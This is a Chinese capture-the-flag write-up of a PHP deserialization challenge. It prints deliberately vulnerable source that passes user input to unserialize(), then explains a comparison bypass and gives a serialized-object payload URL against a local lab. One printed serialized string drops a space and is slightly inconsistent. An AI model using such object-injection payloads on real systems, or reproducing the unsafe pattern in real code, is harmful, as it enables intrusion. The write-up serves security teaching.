题解:2020-网鼎杯-青年组-Web-AreUSerialz

优质文章学习记录

7 min read

一、涉及知识点

序列化 serialize():将⼀个变量的数据转换为字符串。

反序列化 unserialize():将序列化后的字符串还原。

魔术方法 __destruct(析构函数):是 PHP 内置的魔术方法,核心作用是释放资源。

魔术方法 __wakeup:是 PHP 内置的魔术方法,当使用unserialize() 函数反序列化一个对象时,PHP 会自动调用该对象所属类的__wakeup方法。核心作用是:初始化反序列化对象资源,即恢复反序列化对象的状态

二、真题解析步骤

最终目的:获得flag

1、获取源码

第一步:访问目标网站

第二步:前台界面(防御级别高,F12调试一下,不是重点)

第三步:7kscan扫描出 后台页面/子域名页面(更容易破解,重点关注)

第四步:访问后台页面/子域名页面,会下载 一个ctf.zip

第五步:解压到本地靶场查看源码 NewFlag.php 和 ctf2.php

2、分析源码

2.1 NewFlag.php 源码

<?php class NewFlag { public static function getFlag($fileName) { $res = "flag error"; if($fileName ==="NewFlag.php") { $res = "flag:{this is flag}";//好像是flag } return $res; } } ?>

2.2 ctf2.php 源码

<?php include("NewFlag.php"); highlight_file(__FILE__); class FileHandler { //这是一个类 protected $op; //protected是访问控制修饰 protected $filename; protected $content; // 没有看到 new __construct(),__construct()就不会被调用,不需要看 function __construct() { $op = "1"; $filename = "tmpfile"; $content = "Hello World!"; $this->process(); } //⑥重点2 【1就写;2就读(目的:让代码读取我的需求)】 public function process() { if($this->op == "1") {//如果是1,就调用write() 写 $this->write(); } //如果是2,就调用read() 读【⑧要想调用read(),要让op==2】 //在真正if的时候,会忽略空格, " 2"就等同于"2",这样"2"=="2"就成立,为真,就调用了read() else if($this->op == "2") { $res = $this->read(); $this->output($res); } else { $this->output("Bad Hacker!"); } } private function write() { if(isset($this->filename) && isset($this->content)) { if(strlen((string)$this->content) > 100) { $this->output("Too long!"); die(); } $res = file_put_contents($this->filename, $this->content); if($res) $this->output("Successful!"); else $this->output("Failed!"); } else { $this->output("Failed!"); } } //⑦读 有flag【想办法调用read(),就能拿到flag】 private function read() { $res = ""; if(isset($this->filename)) { $res = NewFlag::getFlag($this->filename);//flag,这是我们的目标成果 } return $res; } private function output($s) { echo "[Result]: <br>"; echo $s; } //④重点1 function __destruct() { //⑨当op==2的时候,它直接给op赋值为1;op==1,就没办法调用read(),也就拿不到flag了,怎么办呢??? //在2前面+空格,这样“ 2” === "2" 就为假,op就不会被赋值为1 if($this->op === "2") $this->op = "1"; $this->content = ""; $this->process();//⑤调用process(),我们就去看看process()里面写的什么 } } function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false; return true; } #main ①这里是入口,只是没有写main if(isset($_GET{'str'})) { //给get传一个str参数 $str = (string)$_GET['str']; if(is_valid($str)) { //②调用此 反序列化【前提是:必须先序列化】函数时,会调用__wakeup魔术方法 $obj = unserialize($str); } } //③猜测:代码执行完成后,一定会调用__destruct函数(销毁) ?>

2.3 ctf2.php 源码分析思路

第一步:找到main入口
//整个代码的入口 if(isset($_GET{'str'})) { //以get请求给接收str的上传的内容 $str = (string)$_GET['str']; if(is_valid($str)) { //调用此 反序列化【前提是:必须先序列化】函数时,会调用__wakeup魔术方法 $obj = unserialize($str); }
分析内容:
    $obj = unserialize($str); 调用反序列unserialize()函数会调用__wakeup魔术方法【反序列化的前提是 要先序列化】
    查找代码中是否调用了__wakeup魔术方法 ==》 发现没有
    猜测:代码执行完成后,一定会调用__destruct函数(销毁)
    查找代码中是否调用了__destruct ==》 发现有
第二步:查看__destruct函数
//④重点1 function __destruct() { //⑨当op==2的时候,它直接给op赋值为1;op==1,就没办法调用read(),也就拿不到flag了,怎么办呢??? //在2前面+空格,这样“ 2” === "2" 就为假,op就不会被赋值为1 if($this->op === "2") $this->op = "1"; $this->content = ""; //⑤调用process(),我们就去看看process()里面写的什么 $this->process(); }
分析内容:当op==2的时候,会被重新赋值为1 ==》 $this->process();
第三步:查看 process()函数
//⑥重点2 【1就写;2就读(目的:让代码读取我的需求)】 public function process() { if($this->op == "1") {//如果是1,就调用write() 写 $this->write(); } //如果是2,就调用read() 读【⑧要想调用read(),要让op==2】 //在真正if的时候,会忽略空格, " 2"就等同于"2",这样"2"=="2"就成立,为真,就调用了read() else if($this->op == "2") { $res = $this->read(); $this->output($res); } else { $this->output("Bad Hacker!"); } }
分析内容:
    当op==1的时候,会调用write()函数【写】
    当op==2的时候,会调用read()函数【读】
第四步:查看 write()函数 和 read()函数
//write()写函数 private function write() { if(isset($this->filename) && isset($this->content)) { if(strlen((string)$this->content) > 100) { $this->output("Too long!"); die(); } $res = file_put_contents($this->filename, $this->content); if($res) $this->output("Successful!"); else $this->output("Failed!"); } else { $this->output("Failed!"); } } //⑦read()读函数 有flag【想办法调用read(),就能拿到flag】 private function read() { $res = ""; if(isset($this->filename)) { $res = NewFlag::getFlag($this->filename);//flag,这是我们的目标成果 } return $res; } private function output($s) { echo "[Result]: <br>"; echo $s; }
分析内容:
    发现read()函数中存在flag,那就要想办法调用read()函数
    调用read()函数需要什么条件,前面提到:op==2时,调用read()函数,那就要想办法让 op==2
    怎样才能让 op==2呢??
    前面提到:【__destruct 函数中:当op==2的时候,会被重新赋值为1】,这样看 op就不能是2了
    但是 只有 op==2时,才会调用read()函数。这就很矛盾了,怎么办呢???


方法:我们给 op 赋值为 “ 2”【在2前面加空格】就满足条件了。
原理:在process() 函数中,if判断条件时,会自动忽略空格。
第五步:得出结论
1、反序列化的前提是 要先序列化,所以我们要给str一个序列化后的值

2、op==" 2"

3、获取flag 具体实现步骤

第一步:访问 ctf2.php

>根据结论得出:http://127.0.0.1/14xlh/ctf2.php?str=序列化的码

第二步:获取序列化的码

序列化在线工具: https://c.runoob.com/compile/1/

(1)需要序列化的内容
//由于代码太长,我们只保留重点部分 <?php class FileHandler { protected $op=' 2';//op==" 2" protected $filename='NewFlag.php'; protected $content='cs'; } $result=new FileHandler(); echo (serialize($result));//序列化 ?>
(2)得到的内容中有乱码

(3)修改 protected 为 public

【因为protected是受保护的,所以是乱码,我们改成public公开的,就解决乱码问题了】

//由于代码太长,我们只保留重点部分 <?php class FileHandler { public $op=' 2';//op==" 2" public $filename='NewFlag.php'; public $content='cs'; } $result=new FileHandler(); echo (serialize($result));//序列化 ?>
(4)得到序列化的码
O:11:"FileHandler":3:{s:2:"op";s:2:"2";s:8:"filename";s:11:"NewFlag.php";s:7:"content";s:2:"cs";}

第三步:组装访问

http://127.0.0.1/14xlh/ctf2.php?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:11:"NewFlag.php";s:7:"content";s:2:"cs";}

结果是错误的,什么原因呢?是phpstudy的版本太低了,我们切换为高版本。

第四步:再次访问

http://127.0.0.1/14xlh/ctf2.php?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:11:"NewFlag.php";s:7:"content";s:2:"cs";}

第五步:成功拿到flag

flag:{33858534-shegruie353-shgdg23shreigeli1234}

Read more

【花雕学编程】Arduino BLDC 驱动方案 —— MimiClaw(迷你小龙虾)+ ESP32 嵌入式组合机器人

【花雕学编程】Arduino BLDC 驱动方案 —— MimiClaw(迷你小龙虾)+ ESP32 嵌入式组合机器人

这是一套面向无刷电机(BLDC)、高度集成、可快速开发、支持本地智能的机器人开发组合。它将 ESP32 高性能主控 + MimiClaw 智能控制框架 + Arduino 生态易用性 + BLDC 无刷电机驱动 融为一体,是目前创客、实验室、竞赛、小型机器人领域最实用、最稳定、性价比极高的嵌入式机器人方案。 一、核心定义(专业版一句话解释) MimiClaw(迷你小龙虾)+ ESP32是一套基于 Arduino 开发环境、面向 BLDC 无刷电机控制、支持本地智能决策的嵌入式机器人控制系统。它以 ESP32 为硬件核心,以 MimiClaw 为控制大脑,实现无刷电机驱动、传感器融合、自主决策、无线通信、多关节机器人控制一体化。 简单说:ESP32 = 身体与算力MimiClaw = 思考与逻辑BLDC 无刷驱动 = 动力系统Arduino

DankDroneDownloader:大疆无人机固件自由下载终极指南

DankDroneDownloader:大疆无人机固件自由下载终极指南 【免费下载链接】DankDroneDownloaderA Custom Firmware Download Tool for DJI Drones Written in C# 项目地址: https://gitcode.com/gh_mirrors/da/DankDroneDownloader 想要完全掌控你的大疆无人机固件版本吗?厌倦了厂商限制固件选择权的做法?DankDroneDownloader(简称DDD)正是你需要的解决方案!这个免费开源的C#工具让你重新获得固件下载的完全自由,支持大疆全系列无人机和配件。 🚀 打破限制,重获控制权 大疆等无人机厂商常常移除旧版固件,限制用户只能使用最新版本。但很多时候,旧版固件更加稳定,或者包含某些新版移除的实用功能。DDD解决了这个痛点,为你提供完整的固件版本历史存档。 核心优势: * 支持大疆无人机全系列固件下载 * 提供Windows桌面应用程序 * 与第三方刷写工具完美兼容 * 持续更新的固件库 📋 全面支持的设备列表 DDD目前
Windows 安装 Neo4j(2025最新·极简)

Windows 安装 Neo4j(2025最新·极简)

目录 1. 准备 2. 下载安装包 3. 一键安装 4. 启动 Neo4j 5.安装 Neo4j 的系统服务 Neo4j 是目前最流行的原生图数据库,用图结构(节点-关系-属性)存储数据,而非传统表结构。它专为海量关联数据设计,提供: * 原生图存储:基于免索引邻接结构,每个节点直接维护指向相邻节点的物理指针,实现 O(1) 时间复杂度的图遍历。 * Cypher 查询语言:ISO 标准化图查询语言,采用 ASCII-Art 模式匹配语法,支持可变长度路径、子图查询、聚合与更新混合事务。 * ACID 事务:支持完整事务、集群高可用,可承载企业级负载。 * 丰富生态:内置 Graph Data Science (GDS)

Techub News 專訪高鋒集團合夥人、Web3Labs行政總裁黃俊瑯:以資本與生態,賦能傳統企業Web3轉型

本次專訪聚焦高鋒集團如何透過資本投入與生態資源,助力傳統企業邁向Web3轉型。從近期戰略參與上市公司德祥地產的配股出發,高鋒集團合夥人、Web3Labs CEO黃俊瑯(Caspar)分享了集團的戰略思考、核心優勢、執行機制,以及對傳統企業轉型痛點的觀察與未來願景。這場對話展現了高鋒集團與Web3Labs在「實物資產代幣化」(RWA)等領域的創新實踐,以及他們致力成為傳統企業數字化轉型可靠夥伴的定位。 戰略投資德祥地產:搭建Web3與傳統實體經濟的橋樑 Techub News:Caspar您好。我們注意到高鋒集團近期戰略性參與了上市公司德祥地產的配股。這在市場看來頗為創新,能否請您談談這次投資背後的戰略思考? 黃俊瑯:這次對德祥地產的投資,對我們而言,遠超一次單純的財務投資。它是一個清晰的信號,也是我們戰略的關鍵落子。高鋒集團的核心使命之一,是搭建Web3前沿科技與傳統實體經濟之間的橋樑。德祥擁有紮實的房地產業務與實物資產,這正是探索「實物資產代幣化」(RWA)最具潛力的領域。我們這次參與,是協助其啟動轉型的第一步,未來將結合我們的專業生態,共同探索如何利用區塊鏈技術提升資產流